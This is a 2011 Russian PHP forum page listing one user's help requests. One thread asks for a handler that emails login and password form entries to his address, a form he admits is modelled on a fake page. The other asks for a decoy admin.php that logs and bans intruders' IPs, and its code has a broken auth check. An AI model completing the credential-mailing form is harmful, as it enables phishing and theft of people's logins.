PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи

Страниц (1): [1]

> Найдено сообщений: 13
neyron Отправлено: 22 Декабря, 2011 - 20:12:33 • Тема: Приглашаю начинающих верстальщика, дизайнера и программиста. • Форум: FreeLance

Ответов: 15
Просмотров: 5589
готов пойти дизайнером
neyron Отправлено: 19 Декабря, 2011 - 11:38:06 • Тема: Вопрос с формой отправки письма • Форум: Напишите за меня, пожалуйста

Ответов: 6
Просмотров: 1356
snikers987 Воровать никто и не собирался) просто изучаю php. Решил понять, как отправлять данные с формы. Первое что в голову пришло, это сделать форму на примере фейка
(Добавление)
snikers987спасибо большое
neyron Отправлено: 19 Декабря, 2011 - 10:45:36 • Тема: Вопрос с формой отправки письма • Форум: Напишите за меня, пожалуйста

Ответов: 6
Просмотров: 1356
snikers987не работает
neyron Отправлено: 19 Декабря, 2011 - 09:55:50 • Тема: Вопрос с формой отправки письма • Форум: Напишите за меня, пожалуйста

Ответов: 6
Просмотров: 1356
Написал! А мне приходит только запятая
PHP:
скопировать код в буфер обмена
  1. <title>Сообщение отправлено</title>
  2. <?PHP
  3. $to= "Neyron <Neyron2011@gmail.com>" . ", " ; //обратите внимание на запятую
  4. /* тема/subject */
  5. $subject = "Birthday Reminders for August";
  6.  
  7. $message = "$login, $password";
  8.  
  9. /* Для отправки HTML-почты вы можете установить шапку Content-type. */
  10. $headers= "MIME-Version: 1.0\r\n";
  11. $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
  12.  
  13. /* и теперь отправим из */
  14. mail($to, $subject, $message, $headers);
  15. ?>
neyron Отправлено: 18 Декабря, 2011 - 21:26:50 • Тема: Вопрос с формой отправки письма • Форум: Напишите за меня, пожалуйста

Ответов: 6
Просмотров: 1356
Вот я сделал форму
CODE (html):
скопировать код в буфер обмена
  1. <html>
  2. <head>
  3. <title>blabla</title>
  4. </head>
  5. <body>
  6.  
  7. <form method="post"action="blabla.php">
  8. логин <input type="text" name="login">
  9. пароль <input type="text" name="password">
  10. <input type="submit" value="отправить">
  11. </form>
  12.  
  13. </body>
  14. </html>


Каким должен быть файл blabla.php, чтобы он отправлял данные мне на почту neyron2011@gmail.com . Напишите пожалуйста содержимое обработчика.
(Добавление)
тоесть мне нужен файл blabla.php!
neyron Отправлено: 18 Декабря, 2011 - 21:24:41 • Тема: Вопрос с формой входа • Форум: Напишите за меня, пожалуйста

Ответов: 20
Просмотров: 2364
etoYA спасибо большое) проблема решена)
neyron Отправлено: 18 Декабря, 2011 - 13:12:11 • Тема: Вопрос с формой входа • Форум: Напишите за меня, пожалуйста

Ответов: 20
Просмотров: 2364
Поможет кто-нибудь?
neyron Отправлено: 18 Декабря, 2011 - 09:50:50 • Тема: Вопрос с формой входа • Форум: Напишите за меня, пожалуйста

Ответов: 20
Просмотров: 2364
Вы меня не правильно поняли. Слушайте в чем фишка. На Dle админка называется admin.php . я её переименовал, мне сделали скрипт, защищающий её ещё 1 логином и паролем, тоесть до неё не добраться.
А теперь про этот скрипт: я хочу сделать файл со старым названием admin.php у которого дизайн будет как настоящий. Если кто-нибудь узнает мой пароль , зайдет в admin.php, и введет его правильно, то его перенаправит на страницу, забанит по Ip, и мне на почту придет извещение что кто-то пытался в админку попасть. А если он не правильно введет мой пароль, то ему как по-настоящему напишет "пароль неверен, попробуйте ещё раз".

в начале скрипта admin admin это заместо моего логина с паролем
(Добавление)
Тоесть нужна html страница, на которой форма. в случает правильного ввода логин-пароль забанит и перенаправит на другую страницу, а при не правильном вводе напишет что логин/пароль неверен
(Добавление)
Так что напишите занава пожалуйста,
neyron Отправлено: 18 Декабря, 2011 - 00:42:32 • Тема: Вопрос с формой входа • Форум: Напишите за меня, пожалуйста

Ответов: 20
Просмотров: 2364
etoYA почти, только на валид не проверяет прежде чем перебрасывать. это не бред. если захотите узнать зачем это icq 403777818 skype neyron42 . доделайте пожалуйста, чтобы на валид проверял
(Добавление)
etoYA тоесть нужно, чтобы в случает ввода admin admin перебрасывало на страницу, а если значения отличные от admin admin , то писало попробуйте ещё раз
neyron Отправлено: 17 Декабря, 2011 - 23:51:10 • Тема: Вопрос с формой входа • Форум: Напишите за меня, пожалуйста

Ответов: 20
Просмотров: 2364
etoYA Вы не так поняли. Эти данные так и должны быть, именно их мы и проверяем. В случае правильности введенных данных вылазит ошибка, а в случае правильности редикрет. Нужен html самой формы входа. для наглядности, чтобы вы поняли maxi-game.ru/admin.php Видите сразу вылазит окно. А нужно чтобы оно в html странице было.
neyron Отправлено: 17 Декабря, 2011 - 23:06:54 • Тема: Вопрос с формой входа • Форум: Напишите за меня, пожалуйста

Ответов: 20
Просмотров: 2364
sKaaЯ в php не шарю, только в html и css. вот мне и нужно чтобы форма была в html, а я сделал её дизайн
neyron Отправлено: 17 Декабря, 2011 - 22:41:09 • Тема: Вопрос с формой входа • Форум: Напишите за меня, пожалуйста

Ответов: 20
Просмотров: 2364
DeepVarvarкод не я писал
neyron Отправлено: 17 Декабря, 2011 - 21:50:08 • Тема: Вопрос с формой входа • Форум: Напишите за меня, пожалуйста

Ответов: 20
Просмотров: 2364
В общем дан код

CODE (htmlphp):
скопировать код в буфер обмена
  1. <?php
  2. if (isset($_POST[logout])) {
  3. }  
  4. $adm_name = "admin";
  5. $adm_pass = "admin";
  6. function adm_auth(){
  7. Header ("WWW-Authenticate: Basic realm=Alarm_Zone");
  8. Header ("HTTP/1.0 401 Unauthorized");
  9. echo '<html><head><title>Вход в админ панель</title></head>
  10. <body><center><br /><h2>Логин и пароль введены не верно,<br /> для повторного ввода обновите страницу.</h2></center></body></html>';
  11. }
  12. if (empty($_SERVER["PHP_AUTH_USER"])){
  13. adm_auth();
  14. }
  15. if ($_SERVER['PHP_AUTH_USER'] != $adm_name && $_SERVER['PHP_AUTH_PW'] != $adm_pass){
  16. adm_auth();
  17. }
  18. $ip = getenv ("REMOTE_ADDR");
  19.  
  20. $log = fopen("ip.txt", "a+");
  21. fwrite($log, "// ".$ip."\n");
  22. fclose($log);
  23.  
  24. $f = fopen($_SERVER['DOCUMENT_ROOT'] . '/.htaccess', "a");
  25. fwrite($f, "\ndeny from " . $ip);
  26. fclose($f);
  27. echo "<html><head><title></title><style>span {background:#ffffff;font-size:8pt;padding:0px;} marquee {line-height: 5px;padding:0px;width:100px;background:#0080A9;border: 1px solid#005F7E;color:#FFFFFF;}</style></head>
  28. <body><center><br /><h3>копипаста $ip (_._)</h3><br /><img alt=\"Н.к.й, бл..ть!\" src=\"http://gyazo.com/ec58ce7f32ccaa51ebcbaffdedb2f5d9.png\" /></center></body></html>";
  29. ?>



суть этого кода в том, что когда человек попадает на страницу с этим кодом, то вылазит форма ввода логина и пароля. Если человек вводит их не правильно (а они логин:admin пароль:admin) , то его просят попробовать ещё раз. а если правильно, то вылазит сообщение с картинкой. Проблема в том, что нужно, чтобы форма входа не выскакивала просто так, а была заключена в html коде. помогите пожалуйста.

Страниц (1): [1]
Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB